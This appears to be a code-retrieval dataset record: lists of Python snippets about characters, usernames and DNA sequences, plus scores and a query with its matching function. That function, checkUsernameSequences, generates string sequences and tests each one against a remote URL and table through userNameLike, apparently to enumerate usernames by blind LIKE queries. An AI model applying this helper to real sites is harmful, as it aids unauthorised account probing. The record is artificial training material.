self.assertFalse(all_unique_chars(\"alabama\"))\n self.assertFalse(all_unique_chars(\"Ricardio\"))\n self.assertFalse(all_unique_chars(\"aardvark\"))\n self.assertFalse(all_unique_chars(\"Zimbabwe\"))\n self.assertFalse(all_unique_chars(\"....What?....\"))", "def alpha_chars (text):\n for letter in text:\n if letter.isalpha ():\n yield letter", "def onlyuse(word, letters):\r\n truth = True\r\n for letter in word:\r\n truth = letter in letters and truth\r\n return truth", "def test_multiple_char_unique(self):\n self.assertTrue(all_unique_chars(\"ab\"))\n self.assertTrue(all_unique_chars(\"ba\"))\n self.assertTrue(all_unique_chars(\"make\"))\n self.assertTrue(all_unique_chars(\"thorn\"))\n self.assertTrue(all_unique_chars(\"malibu\"))\n self.assertTrue(all_unique_chars(string.ascii_letters))", "def get_available_letters():\n available = string.ascii_lowercase\n\n return available", "def _filter_string(cls, string, extra_chars=\"\"):\n char_white_list = ascii_letters + digits + extra_chars\n return \"\".join([char for char in string if char in char_white_list])", "def _filter_string(cls, string, extra_chars=\"\"):\n char_white_list = ascii_letters + digits + extra_chars\n return \"\".join([char for char in string if char in char_white_list])", "def sanitize_str(s):\n # throw away unkown characters\n return [c for c in s if c in letters]", "def alias_matches(self, text):\n #print 'Completer->alias_matches:',text # dbg\n text = os.path.expanduser(text)\n aliases = self.alias_table.keys()\n if text == \"\":\n return aliases\n else:\n return [alias for alias in aliases if alias.startswith(text)]", "def find_letters_not_display(guess, secret_word):\n return set(secret_word) - set(guess)", "def has_letter(word):\r\n for char in word:\r\n if char.isalpha():\r\n return True\r\n return False", "def validate_username(username):\n if re.match(r\"^[a-zA-Z0-9åäöÅÄÖ]{3,20}$\", username):\n return True\n return False", "def _get_vowels(sequence: str) -> list:\n vowels = []\n for char in sequence:\n if char in VOWELS:\n vowels.append(char)\n return vowels", "def fun4vowels(value:str)->set:\r\n vowels = set('aeiou')\r\n return vowels.intersection(set(value))", "def _get_char_names(self):\n return [device.get_char_name() for\n device in self.all_devices]", "def contains (self,phrase,chars):\r\n\r\n for x in chars:\r\n\r\n if x in phrase:\r\n return True\r\n return False", "def is_valid_username(self, username):\n rex = \"^[a-zA-Z]{3,}$\"\n return re.match(rex, username)", "def checkWords(line):\n\n words = []\n parts = re.sub('[^a-zA-Z0-9@ ]', '', line)\n parts = parts.lower()\n parts = parts.split(' ')\n for w in parts:\n if w is not '' and len(w) > 4 and len(w) < 15 and w not in commonWords:\n # if w is not '':\n words.append(w)\n\n return words", "def get_words(f: str, letters: List[str]) -> List[str]:\r\n forbidden_letters = [i for i in string.ascii_lowercase]\r\n for i in letters:\r\n try:\r\n forbidden_letters.remove(i)\r\n except:\r\n pass\r\n words_file = open(f)\r\n word_list = []\r\n letstr = \"\"\r\n for i in letters:\r\n letstr += i\r\n for word in words_file:\r\n word = word[:-1].lower()\r\n if len(word) >= 4:\r\n count = 0\r\n for let in word:\r\n if let in forbidden_letters:\r\n count += 1\r\n if word.count(let) > letstr.count(let):\r\n count += 1\r\n if letters[4] not in word:\r\n count += 1\r\n if count == 0:\r\n word_list.append(word)\r\n return word_list", "def is_valid_username(username):\n import string\n\n if not (len(username) > 2 and len(username) < 65):\n return False\n if not username[0] in string.letters:\n return False\n m = re_valid_username.match(username)\n return m.start() == 0 and m.end() == len(username)", "def fetch_usernames(self, users):\n user_list = []\n for user in users:\n user_list.append(user.username)\n return user_list", "def player(self, irc, msg, args, channel, optlist, character):\n if not self.registryValue('full_access', channel):\n irc.reply('Concord denies you access on this channel!')\n return\n\n chars = self._sql(\"\"\"\n SELECT c.username, s.name AS character FROM accounting_capsuler c, character_charactersheet s\n WHERE s.owner_id=c.id and s.name ILIKE %s;\"\"\", ['%%{0}%%'.format(character)], single=False)\n\n if len(chars) == 0:\n irc.reply('Found 0 characters like \"{0}\"'.format(character), prefixNick=False)\n return\n\n if (len(chars) <= self.registryValue('max_lines', channel) or ('all', True) in optlist) \\\n and len(chars) > 0:\n for char in chars:\n irc.reply('{0} :: {1}'.format(\n ircutils.bold(char['username']),\n ircutils.bold(char['character'])\n ), prefixNick=False)\n elif len(chars) > self.registryValue('max_lines', channel):\n irc.reply('Found {0} characters matching \"{1}\", but will list them all unless you use \"owner --all {1}\".'.format(\n len(chars),\n character,\n ), prefixNick=False)", "def user_list(self):\n self.cur.execute(\"SELECT username FROM users\")\n users = []\n for username in self.cur.fetchall():\n users.append(username[0])\n return users", "def users():\n retlist = []\n rawlist = cext.users()\n for item in rawlist:\n user, hostname, tstamp = item\n user = py2_strencode(user)\n nt = _common.suser(user, None, hostname, tstamp, None)\n retlist.append(nt)\n return retlist", "def get_user_list(self):\n self.user_list = db.get_user_list()\n for each in self.user_list:\n print each[1] # username\n while(True):\n selection = raw_input(\"Enter username to use\")\n if selection in self.user_list:\n return selection", "def test_multiple_char_unique(self):\n self.assertTrue(all_unique_chars_no_set(\"ab\"))\n self.assertTrue(all_unique_chars_no_set(\"ba\"))\n self.assertTrue(all_unique_chars_no_set(\"make\"))\n self.assertTrue(all_unique_chars_no_set(\"thorn\"))\n self.assertTrue(all_unique_chars_no_set(\"malibu\"))\n self.assertTrue(all_unique_chars_no_set(string.ascii_letters))", "def is_letter(user_input):\n # If any characters is letter -> return boolean True else False\n if any(char.isalpha() for char in user_input):\n return True\n return False", "def simple_unique_characters(word):\n return len(set(word)) == len(word)", "def filter_usernames(self, usernames):\n\t\tself.usernames += self._coerce_list(usernames)", "def verify_username(username):\n name_reg_exp = re.compile(r\"^[a-zA-Z0-9_-]{3,20}$\")\n return username and name_reg_exp.match(username)", "def _characters(self):\n self.characters = list(\n set([item for sublist in self.grid for item in sublist])\n )\n return self.characters", "def disallow_username_substring(self) -> bool:\n return pulumi.get(self, \"disallow_username_substring\")", "def ig_users_in(body):\n import re\n\n try:\n user_re = Formatter.USER_TAG_REGEX\n except AttributeError:\n # escape special characters so we can format the user-tag into a\n # regex pattern\n escaped_user_tag = re.sub(\n # match any '[', ']', '(', or ')'\n r'([\\[\\]\\(\\)])',\n # escape the matched character\n r'\\\\\\1',\n Formatter.USER_TAG\n )\n pattern = escaped_user_tag.format(\n user_raw='({0})'.format(instagram.USERNAME_PTN)\n )\n user_re = re.compile(pattern)\n Formatter.USER_TAG_REGEX = user_re\n\n return user_re.findall(body)", "def get_vowel_names():", "def get_users_by_name(query):\n\n user_list = None\n if query == None:\n user_list = User.objects.filter(Q(user_profile__isnull=False))\n else:\n user_list = User.objects.filter(Q(first_name__icontains=query) | Q(last_name__icontains=query)).distinct()\n return user_list", "def filter_data(text):\n\tlist_of_words = text.split()\n\t#remove non-alphabetical characters and convert to lower case\n\tlist_of_words = [''.join([char for char in word if char in string.ascii_letters]).lower() for word in list_of_words]\n\t#remove empty spaces\n\tlist_of_words = [word for word in list_of_words if word.isalpha()]\n\t#print(list_of_words)\n\treturn list_of_words", "def get_char_names(charlist, caller):\n watch_list = caller.db.watching or []\n verbose_where = False\n if caller.tags.get(\"verbose_where\"):\n verbose_where = True\n return \", \".join(\n char_name(char, verbose_where, watch_list)\n for char in charlist\n if char.player\n and (not char.player.db.hide_from_watch or caller.check_permstring(\"builders\"))\n )", "def char_analyzer(text):\n tokens = text.split()\n return [token[i: i + 3] for token in tokens for i in range(len(token) - 2)]", "def get_speakers(words):\n speakers = []\n utterances = \" \".join(words).split(\"<|endoftext|>\")[:-1]\n for u in utterances:\n s = u.split(\":\")[0].strip() # select names according to \":\"\n if s:\n speakers.append(s)\n return list(set(speakers))", "def verify_username(entered_username):\n return USER_RE.match(entered_username)", "def _readUsers(directory):\n\tfiles = os.listdir(directory)\n\tthese_users = []\n\tfor text_file in files:\n\t\tcurrent_file = directory + '/' + text_file\n\t\tf = open(current_file, 'r')\n\t\ttweet_list = f.readlines()\n\t\tsplitted = [string.replace('\"', '').strip().split(',') for string in tweet_list]\n\t\tfor user in splitted:\n\t\t\tif user[1] not in these_users:\n\t\t\t\tthese_users.append(user[1])\n\t\t\telse:\n\t\t\t\tcontinue\n\treturn these_users", "def missing_letters(sentence):\n set1 = set(\"\".join(\n char for char in sentence if char not in punctuation + \" \").lower()\n )\n return sorted(ALPHA - set1)", "def sameFiveCharStartPredicate(field: str) -> FrozenSet[str]:\n return frozenset(initials(field.replace(\" \", \"\"), 5))", "def valid_username(username):\n user_regex = re.compile(r\"^.{5,20}$\")\n return username and user_regex.match(username)", "def user_names(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:\n return pulumi.get(self, \"user_names\")", "def user_names(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:\n return pulumi.get(self, \"user_names\")", "def check_username(search_username):\n for find_username in USERS_LIST:\n if find_username[\"username\"] == search_username:\n return True\n return False", "def user_names(self) -> pulumi.Output[Optional[Sequence[str]]]:\n return pulumi.get(self, \"user_names\")", "def user_names(self):\n results = []\n for user_detail in self.users:\n results.append(user_detail.user_name)\n results.sort()\n return results", "def find_words_using_all_vowels():\n pass", "def test_multiple_char_not_unique(self):\n self.assertFalse(all_unique_chars_no_set(\"aa\"))\n self.assertFalse(all_unique_chars_no_set(\"alabama\"))\n self.assertFalse(all_unique_chars_no_set(\"Ricardio\"))\n self.assertFalse(all_unique_chars_no_set(\"aardvark\"))\n self.assertFalse(all_unique_chars_no_set(\"Zimbabwe\"))\n self.assertFalse(all_unique_chars_no_set(\"....What?....\"))", "def get_all_users():", "def getUsers(self):\n return [u[0] for u in pwd.getpwall()\n if (u[5].startswith('/home/') and u[6].endswith('sh'))]", "def allowed(cls):\n # type: () -> List[Str]\n names = cls.names()\n allowed = names\n allowed.extend([name.lower() for name in names])\n return allowed" ]
[ "0.65302527", "0.6494948", "0.63683933", "0.6244168", "0.6195335", "0.61639106", "0.61376554", "0.6136397", "0.6090331", "0.6048526", "0.6043042", "0.6035452", "0.60292345", "0.6010415", "0.59815353", "0.5924206", "0.5911422", "0.58786315", "0.5807217", "0.57925546", "0.578954", "0.5780176", "0.5751811", "0.573854", "0.5725921", "0.5721554", "0.5720262", "0.5706431", "0.56956553", "0.5682372", "0.56790066", "0.5659476", "0.5655004", "0.5633892", "0.5627226", "0.56182057", "0.5618038", "0.5612677", "0.55986404", "0.5595659", "0.5574252", "0.5573723", "0.55667377", "0.55514044", "0.55437773", "0.5531418", "0.5521103", "0.55197495", "0.5512152", "0.55083954", "0.55027544", "0.54872155", "0.54872155", "0.5481726", "0.54789346", "0.54704165", "0.5457976", "0.54415774", "0.54367393", "0.5435065", "0.5432177", "0.5427368", "0.54229754", "0.54209816", "0.5406377", "0.5406297", "0.5404552", "0.5399112", "0.5394323", "0.538957", "0.53812325", "0.53748876", "0.5371315", "0.5369103", "0.53631365", "0.53628063", "0.5362077", "0.536191", "0.53605014", "0.5356303", "0.5352838", "0.5348238", "0.53351086", "0.5324077", "0.5305522", "0.5298764", "0.52955204", "0.5292235", "0.5291094", "0.5290781", "0.5286376", "0.5286376", "0.52863735", "0.5280206", "0.52800894", "0.52784675", "0.527619", "0.52728534", "0.5272605", "0.5271956" ]
0.68477184
0
construct sequences and use those to inform the choice of strings. So if a,b,c,d matches, check aa, ab, ac, ad, ba, bb, bc, bd, ca, cb, cc, cd, da, db, dc, dd.
def checkUsernameSequences(n, ch, url, tableName, minLen = 1, maxLen = 2): if(minLen == 1): strLst = ch # assumes all of ch is a match else: strLst = [] for k in range(minLen, maxLen + 1): lst = generateSubSequences(k, ch) sublst = [x for x in lst if userNameLike(x, url, tableName)] # list comprehensions with conditions: # https://stackoverflow.com/questions/6475314/python-for-in-loop-preceded-by-a-variable strLst += sublst return strLst
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def coding_strand_to_AA(dna):\n Seq = ''\n for i in range(0,len(dna),3): \n triple = dna[i:i+3]\n print triple\n for k in range(len(codons)):\n if triple in codons[k]: \n print \"Casey Rocks\"\n print codons[k]\n amino = aa[k]\n Seq+=amino\n return Seq", "def seallable(\n sequence,\n medials={\n 'j', 'w', 'jw', 'wj', 'i̯', 'u̯', 'i̯u̯', 'u̯i̯', 'iu', 'ui', 'y', 'ɥ', 'l',\n 'lj', 'lʲ', 'r', 'rj', 'rʲ', 'ʐ', 'ʑ', 'ʂ', 'ʂ'},\n vowels=VOWELS,\n tones=TONES,\n diacritics=DIACRITICS,\n stress=STRESS,\n cldf=True,\n unknown=REPLACEMENT,\n ):\n if not sequence:\n raise ValueError('empty sequence passed to function')\n if len(sequence) > 5:\n return len(sequence) * [unknown]\n\n cv = soundclass(sequence, model='cv', diacritics=diacritics, stress=stress, cldf=cldf)\n\n ini, med, nuc, cod, ton = 5 * [False]\n\n if 3 <= len(sequence) <= 5:\n # first element must be the initial\n ini = 'i' if cv[0] == 'C' else '?'\n # last element must be tone\n ton = 't' if cv[-1] == 'T' else '?'\n # medial and coda can be missing\n med, nuc, cod = 3 * [False]\n\n # scenario the sequence has 5 elements, all slots must be filled\n if len(sequence) == 5:\n med = 'm' if sequence[1] in medials else '?'\n cod = 'c' if cv[3] == 'C' else '?'\n nuc = 'n' if cv[2] == 'V' else '?'\n \n # scenario the sequence has four slots filled, one must be missing, either\n # coda or medial\n elif len(sequence) == 4:\n med = 'm' if sequence[1] in medials else False\n if not med:\n nuc = 'n' if cv[1] == 'V' else '?'\n cod = 'c' if cv[2] == 'C' else '?'\n else:\n nuc = 'n' if cv[2] == 'V' else '?'\n\n # scenario where the sequence has three slots filled, \n # case 1 : \"ma¹³\". The second token must be a vowel\n # case 2 : \"am¹³\". The first token must be a vowel\n elif len(sequence) == 3:\n if cv[1] == 'V':\n ini = 'i' if cv[0] == 'C' else '?'\n nuc = 'n'\n elif cv[0] == 'V':\n ini = False\n nuc = 'n'\n cod = 'c' if cv[1] == 'C' else '?'\n\n # scenario with two elements only, means that the first element should be a\n # consonant\n elif len(sequence) == 2:\n nuc = 'n' if cv[0] == 'V' else '?'\n ton = 't' if cv[1] == 'T' else '?'\n\n # if only one segment is given, it must be the vowel\n else:\n nuc = 'n' if cv[0] == 'V' else '?'\n\n return [s for s in [ini, med, nuc, cod, ton] if s]", "def controlseq(s): #was the_controlseq\n return any_controlseq().if_value(s)", "def multiple_choice(correct_choice, all_choices):\r\n # format for character is {'あ': 'ah'}\r\n # format for character is {'japanese character': 'english sound'}\r\n\r\n # get 3 different characters from all_choices, randomly\r\n # add all 3 'values', of the k:v pair, to the choices\r\n # if the input from the user != the 'key' of the correct character then it is wrong\r\n # if wrong, try again.\r", "def match(self, seq):\n myseq = seq\n if not type(seq) is Sequence:\n myseq = Sequence(seq, self.alpha)\n mystr = myseq.getString()\n if not Motif.isAlphabet(self, mystr):\n raise RuntimeError(\"Motif alphabet is not valid for sequence \" + myseq.getName())\n for m in re.finditer(self.pattern, mystr):\n yield (m.start(), m.group(), 1.0)", "def coding_strand_to_AA_unit_tests():\n # YOUR IMPLEMENTATION HERE\n input = [\"ATG\", \"ATGCEAFD\", \"FAS\"]\n expected_output = [\"MR\", \"RDS\", \"FF\"]\n actual = []\n for i in input:\n actual.append(coding_strand_to_AA(i))\n print input \n print actual\n print expected_output", "def check1800(s):\n num_translation = str.maketrans(\n 'ABCDEFGHIJKLMNOPQRSTUVWXYZ', '22233344455566677778889999')\n nums_dict = defaultdict(list)\n for word in WORDS:\n nums_dict[word.translate(num_translation)].append(word)\n\n number = s[6:].replace('-', '').translate(num_translation)\n\n # we take the cartesian product of all the options for the first word and all the options for the second.\n\n # case 1, first word is 3 letter & second is 4 letter\n possibilities1 = {'1-800-{}-{}'.format(*poss) for poss in it.product(\n nums_dict[number[:3]], nums_dict[number[3:]])}\n\n # case 2, first word is 4 letter & second is 3 letter\n possibilities2 = {'1-800-{}-{}'.format(*poss) for poss in it.product(\n nums_dict[number[:4]], nums_dict[number[4:]])}\n\n return possibilities1.union(possibilities2)", "def ForegroundSeqs(sequences):\n seqs = []\n yts = [\"Y\", \"T\", \"S\"]\n for motif in sequences:\n motif = motif.upper()\n assert \"-\" not in motif, \"gap in motif\"\n assert motif[5] in yts, \"WRONG CENTRAL AMINO ACID\"\n seqs.append(Seq(motif, alphabet=AAlist))\n return seqs", "def testSeqMatch(self): # - - - - - - - - - - - - - - - - - - - - - - - - -\n\n for pair in self.string_pairs:\n\n approx_str_value = stringcmp.seqmatch(pair[0],pair[1])\n\n assert (isinstance(approx_str_value,float)), \\\n '\"SeqMatch\" does not return a floating point number for: '+ \\\n str(pair)\n\n assert (approx_str_value >= 0.0), \\\n '\"SeqMatch\" returns a negative number for: '+str(pair)\n\n assert (approx_str_value <= 1.0), \\\n '\"SeqMatch\" returns a number larger than 1.0 for: '+str(pair)\n\n approx_str_value_1 = stringcmp.seqmatch(pair[0],pair[1])\n approx_str_value_2 = stringcmp.seqmatch(pair[1],pair[0])\n\n assert (approx_str_value_1 == approx_str_value_2), \\\n '\"SeqMatch\" returns different values for pair and swapped ' + \\\n 'pair: '+str(pair)+': '+str(approx_str_value_1)+', '+ \\\n str(approx_str_value_2)\n\n # Check for value 1.0 if the strings are the same\n #\n if (pair[0] == pair[1]):\n\n assert (approx_str_value == 1.0), \\\n '\"SeqMatch\" does not return 1.0 if strings are equal: '+ \\\n str(pair)", "def guess_seq(seq):\n dna = \"ACTG-N\"\n \n chars = util.unique(seq.upper())\n \n for char in chars:\n if char not in dna:\n return \"pep\"\n return \"dna\"", "def translate_sequence(rna_sequence, genetic_code):\n #Crate an empty list to store AA sequence:\n AA_list = []\n # Convert all rna_sequence to upper case:\n rna_sequence=rna_sequence.upper()\n # Convert all rna_sequence into a list:\n rna_list = list(rna_sequence)\n # This conditon will run if rna_sequence is at least 3 bases long, and only once it find start codon ,\n #and stop once it finds stop codon.\n while True:\n if len(rna_list) > 2:\n codon=''.join(rna_list[0:3])\n #Delete first 3 bases since its alread added as codon, thus no longer needed.\n del rna_list[0:3]\n else:\n break\n #Using genetic code dictionary to find AA for each corresponding codon:\n AA=genetic_code[codon]\n #Break loop once it finds stop codon\n if AA=='*':\n break\n #Add add translatable AA to the AA_list:\n AA_list.append(AA)\n return ''.join(AA_list)", "def play_with_regex():\n\n DNA_string = \"ATTTGTATGTTCGGCTAACTTCTACCCATCCCCCGAAGTTTAGCAGGTCGTGAGGTGTCATGGAGGCTCTCGTTCATCCCGTGGGACATCAAGCTTCGCCTTGATAAAGCACCCCGCTCGGGTGTAGCAGAGAAGACGCCTACTGAATTGTGCGATCCCTCCACCTCAGCTAAGGTAGCTACCAATATTTAGTTTTTTAGCCTTGCGACAGACCTCCTACTTAGATTGCCACGCATTGAGCTAGCGAGTCAGCGATAAGCATGACGCGCTTTCAAGCGTCGCGAGTATGTGAACCAAGGCTCCGGACAGGACTATATACTTGGGTTTGATCTCGCCCCGACAACTGCAAACCTCAACATTTATAGATTATAAGGTTAGCCGAAATTGCACGTGGTGGCGCCCGCCGACTGCTCCCCGAGTGTGGCTCTTTGATCTGACAACGCGCGACCTCCATCGCGGCCGATTGTTTCTGCGGACCATGTCGTCCTCATAGTTTGGGCATGTTTCCGTTGTAGGAGTGAAGCCACTTAGCTTTGCGCCGTAGTCCCAATGAAAAACCTATGGACTTTGTTTTGGGTAGCATCAGGAATCTGAACCCTGTGAATGTGGGGGTCGCGCGCATAGACCTTTATCTCCGGTTCAAGTTAGGCATGAGGCTGCATGCTACGTTGTCACACCTACACTGCTCGAAGTAAATATGGGAAGCGCGCGGCCTGGCCCGAGGCGTTCCGCGCCGCCACGTGTTCGTTAACTGTTGATTGGTGGCACATAAGCAATACCGTAGTCCCTCAAATTCAGCTCTGTTATCTCGAGCGTTATGTGTCAAATGGCGTAGAACGGGATTGACTGTTTGACACTAGCTGGTGTTCGGTTCGGTAACGGAGAATCTGTGGGGCTATGTCACTAATACTTTCGAAACGCCCCGTACCGATGCTGAACAAGTCGATGCAGGCTCCCGTCTTTGAATAGGGGTAAACATACAAGTCGATAGAAGATGGGT\"\n \n # 1. check if DNA_string starts with \"ATTTGTATG\" (say with re.search() or re.findall())\n regex = re.compile('ATTTGTATG')\n m = regex.search(DNA_string)\n \n # 2. use re.findall() if there are instances of 5 or more consecutive c's in DNA_string\n m = re.finditer('C{5,}',DNA_string)\n for entry in m:\n print entry.span()\n \n # 3. find instances of the motif GGXY in the DNA sequence \n # where X={A,C,G,T} and Y={C,T}\n m = re.finditer('GG[ACGT][CT]',DNA_string)\n print \"NUMBER 3\"\n for entry in m:\n print entry.span()", "def generate_aa_sequence(chain):\n\n chain.strip()\n chain_list = chain.split(' ')\n # TODO: What if aa is not in the lookup\n seq = [IUPAC_AA_codes[aa] for aa in chain_list]\n return ''.join(seq)", "def coding_strand_to_AA_unit_tests():\n input_a='ATTATTATT'\n expected_output='III'\n actual_output=coding_strand_to_AA(input_a)\n print 'Expected Output is ' + expected_output\n print 'Actual Output is ' +actual_output\n \n input_a='ATGATGATT'\n expected_output='MMI'\n actual_output=coding_strand_to_AA(input_a)\n print 'Expected Output is ' + expected_output\n print 'Actual Output is ' +actual_output\n \n # YOUR IMPLEMENTATION HERE", "def aa(seq):\n global codontable\n seq = seq.upper()\n if codontable is None:\n # TODO: figure out the right place for the pre-computed information here\n bases = ['T', 'C', 'A', 'G']\n codons = [a+b+c for a in bases for b in bases for c in bases]\n codons = codons + list(map(lambda x: x.lower(), codons))\n amino_acids = 'FFLLSSSSYY**CC*WLLLLPPPPHHQQRRRRIIIMTTTTNNKKSSRRVVVVAAAADDEEGGGG'\n amino_acids = amino_acids + amino_acids.lower()\n codontable = dict(zip(codons, amino_acids))\n res = ''\n for i in range(0, len(seq) - 2, 3):\n res += codontable[seq[i:(i+3)]]\n return res", "def get_combo(un_lit):\n\n done_lit = []\n li_count = len(un_lit)\n\n for letter in un_lit: # for each letter in the provided\n placeholder = 0\n for num in range(li_count) # for each pos in list\n if letter.index == placeholder:\n temp_lit = \n\n elif letter.index > placeholder:\n \n elif letter.index < placeholder:\n\n done_lit.append(temp_lit)\n placeholder += 1", "def get_AA_subs(s):\r\n test_seq = s.toseq()[70:217].translate() #Translate the mutated region\r\n substitutions = []\r\n \r\n for i in range(len(test_seq)):\r\n if test_seq[i] != align_temp[i]:\r\n substitutions.append(''.join([str(align_temp[i]),\r\n str(i+48),\r\n str(test_seq[i]),\r\n ' ']))\r\n \r\n return ''.join(substitutions).strip()", "def do(s):\r\n return get_AA_subs(generate_mutString(s))", "def test_split_seq(self):\r\n seq = 'AAAACCCCCGTGTGTGT'\r\n barcode, primer, remainder = split_seq(seq, 4, 5)\r\n self.assertEqual(barcode, 'AAAA')\r\n self.assertEqual(primer, 'CCCCC')\r\n self.assertEqual(remainder, 'GTGTGTGT')", "def coding_strand_to_AA(dna):\n l = len(dna)\n res = []\n for i in range(0, l, 3):\n s = dna[i: i + 3]\n for j in range(len(codons)):\n# for codon in codons[j]:\n# if codon == s:\n# res.append(aa[j])\n# break;\n if s in codons[j]: # [WOW] Python is really nice unlike C, yay!!\n res.append(aa[j])\n return collapse(res)", "def test_constructPossibleSequenceRegex(self):\n test_cases = [\n ['file03.03.rgb', [r'file(\\d+).03.rgb', r'file03.(\\d+).rgb']],\n ['file3030.030', [r'file(\\d+).030', r'file3030.(\\d+)']],\n ]\n for x, (fileName, regexStrings) in enumerate(test_cases):\n with self.subTest(i=x):\n result = path_core._core.FolderContainer._constructPossibleSequenceRegex(fileName)\n expectedResult = [re.compile(regexString) for regexString in regexStrings]\n self.assertEqual(expectedResult, result)", "def multiple_choice():\n\n return [\"MAR\", \"MAR\", \"NI\", \"NI\", \"MCAR\"]", "def CheckSeq(Seq):\n OkNucleo = (\"A\", \"C\", \"G\", \"T\")\n for i in Seq:\n if i not in OkNucleo:\n raise InputError(Seq,\"malformed input\")", "def RNAorDNA ( seq ) :\n\tif dna_regex . search ( seq ):\n\t\treturn RNA ( seq )\n\n\tif rna_regex . search ( seq ):\n\t\treturn DNA ( seq )", "def test_possibilites(self):\n self.assertEqual(self.RNA(\"\").possibilities(), 1)\n self.assertEqual(self.RNA(\"ACGUgcaucagUCGuGCAU\").possibilities(), 1)\n self.assertEqual(self.RNA(\"N\").possibilities(), 4)\n self.assertEqual(self.RNA(\"R\").possibilities(), 2)\n self.assertEqual(self.RNA(\"H\").possibilities(), 3)\n self.assertEqual(self.RNA(\"nRh\").possibilities(), 24)\n self.assertEqual(\n self.RNA(\"AUGCnGUCAg-aurGauc--gauhcgauacgws\").possibilities(), 96\n )", "def test_build_sequence_multiple_values(self):\n # Test basic sequence rule\n r = Rule(schema={'type': 'seq', 'sequence': [{'type': 'str'}, {'type': 'int'}]})\n assert r.type == \"seq\"\n assert r.matching == \"any\"\n assert len(r.sequence) == 2\n assert isinstance(r.sequence, list)\n assert all(isinstance(r.sequence[i], Rule) for i in range(len(r.sequence)))\n assert r.sequence[0].type == \"str\"\n assert r.sequence[1].type == \"int\"\n\n # Test sequence without explicit type\n r = Rule(schema={'sequence': [{'type': 'str'}, {'type': 'int'}]})\n assert r.type == \"seq\"\n assert r.matching == \"any\"\n assert len(r.sequence) == 2\n assert isinstance(r.sequence, list)\n assert all(isinstance(r.sequence[i], Rule) for i in range(len(r.sequence)))\n assert r.sequence[0].type == \"str\"\n assert r.sequence[1].type == \"int\"\n\n # Test adding matchin rules", "def test_find_all_substrings_03():\n assert (U.find_all_substrings(s, 17, 17) ==\n U.find_all_substrings(s, 17, 18))\n s2 = ''.join([random.choice(s) for i in range(100)])\n assert (U.find_all_substrings(s2, 17, 17) ==\n U.find_all_substrings(s2, 17, 18))", "def test_find_all_substrings_01():\n assert (U.find_all_substrings(s, 17, 300) ==\n U.find_all_substrings(s, 17, 27))\n s2 = ''.join([random.choice(s) for i in range(100)])\n assert (U.find_all_substrings(s2, 17, 300) ==\n U.find_all_substrings(s2, 17, len(s2) + 1))", "def coding_strand_to_AA_unit_tests():\n print \"input: GTTGACAGTACGTACAGGGAA, \"+\"output: \"+coding_strand_to_AA(\"GTTGACAGTACGTACAGGGAA\")+\", actual output: VDSTYRE\"\n print \"input: TTATTGCTTATTATCATG, \"+\"output: \"+coding_strand_to_AA(\"TTATTGCTTATTATCATG\")+\", actual output: LLLIIM\"\n print \"input: TTTTTAATTATGGTTTCTCCTACTGCTTATTAACATCAAAATAAAGATGAATGTTGGCGTGGT, \"+\"output: \"+coding_strand_to_AA(\"TTTTTAATTATGGTTTCTCCTACTGCTTATTAACATCAAAATAAAGATGAATGTTGGCGTGGT\")+\", actual output: FLIMVSPTAY|HQNKDECWRG\"\n print \"input: TT, \" + \"output: \"+coding_strand_to_AA(\"TT\")+\", actual output: ERROR: The provided fragment is too short to contain any codons.\"", "def getSequence(resnames):\n\n get = AAMAP.get\n return ''.join([get(rn, 'X') for rn in resnames])", "def test_find_all_substrings_02():\n assert (U.find_all_substrings(s, 17, 5) ==\n U.find_all_substrings(s, 17, 18))\n s2 = ''.join([random.choice(s) for i in range(100)])\n assert (U.find_all_substrings(s2, 17, 5) ==\n U.find_all_substrings(s2, 17, 18))", "def main():\n\n args = get_args()\n seq = args.seq.upper()\n codon_to_aa = {\n 'AAA': 'K',\n 'AAC': 'N',\n 'AAG': 'K',\n 'AAU': 'N',\n 'ACA': 'T',\n 'ACC': 'T',\n 'ACG': 'T',\n 'ACU': 'T',\n 'AGA': 'R',\n 'AGC': 'S',\n 'AGG': 'R',\n 'AGU': 'S',\n 'AUA': 'I',\n 'AUC': 'I',\n 'AUG': 'M',\n 'AUU': 'I',\n 'CAA': 'Q',\n 'CAC': 'H',\n 'CAG': 'Q',\n 'CAU': 'H',\n 'CCA': 'P',\n 'CCC': 'P',\n 'CCG': 'P',\n 'CCU': 'P',\n 'CGA': 'R',\n 'CGC': 'R',\n 'CGG': 'R',\n 'CGU': 'R',\n 'CUA': 'L',\n 'CUC': 'L',\n 'CUG': 'L',\n 'CUU': 'L',\n 'GAA': 'E',\n 'GAC': 'D',\n 'GAG': 'E',\n 'GAU': 'D',\n 'GCA': 'A',\n 'GCC': 'A',\n 'GCG': 'A',\n 'GCU': 'A',\n 'GGA': 'G',\n 'GGC': 'G',\n 'GGG': 'G',\n 'GGU': 'G',\n 'GUA': 'V',\n 'GUC': 'V',\n 'GUG': 'V',\n 'GUU': 'V',\n 'UAA': 'Stop',\n 'UAC': 'Y',\n 'UAG': 'Stop',\n 'UAU': 'Y',\n 'UCA': 'S',\n 'UCC': 'S',\n 'UCG': 'S',\n 'UCU': 'S',\n 'UGA': 'Stop',\n 'UGC': 'C',\n 'UGG': 'W',\n 'UGU': 'C',\n 'UUA': 'L',\n 'UUC': 'F',\n 'UUG': 'L',\n 'UUU': 'F',\n }\n\n k = 3\n\n # 1: for loop\n # protein = ''\n # for codon in [seq[i:i + k] for i in range(0, len(seq), k)]:\n # aa = codon_to_aa.get(codon, '-')\n # if aa == 'Stop':\n # break\n # protein += aa\n\n # 2: list comprehension, slice to remove Stop\n # codons = [seq[i:i + k] for i in range(0, len(seq), k)]\n # aa = [codon_to_aa.get(codon, '-') for codon in codons]\n # if 'Stop' in aa:\n # aa = aa[:aa.index('Stop')]\n # print(''.join(aa))\n\n # 3: L.C. -> map(), slice -> takewhile\n # codons = map(lambda i: seq[i:i + k], range(0, len(seq), k))\n # aa = map(lambda codon: codon_to_aa.get(codon, '-'), codons)\n # print(''.join(takewhile(lambda c: c != 'Stop', aa)))\n\n # 4: combine map()\n # aa = map(lambda c: codon_to_aa.get(c, '-'),\n # map(lambda i: seq[i:i + k], range(0, len(seq), k)))\n # print(''.join(takewhile(lambda c: c != 'Stop', aa)))\n\n # 5: combine all\n # print(''.join(\n # takewhile(\n # lambda c: c != 'Stop',\n # map(lambda c: codon_to_aa.get(c, '-'),\n # map(lambda i: seq[i:i + k], range(0, len(seq), k))))))\n\n # 6: Seq\n print(str(Seq(args.seq).translate()).replace('*', ''))", "def 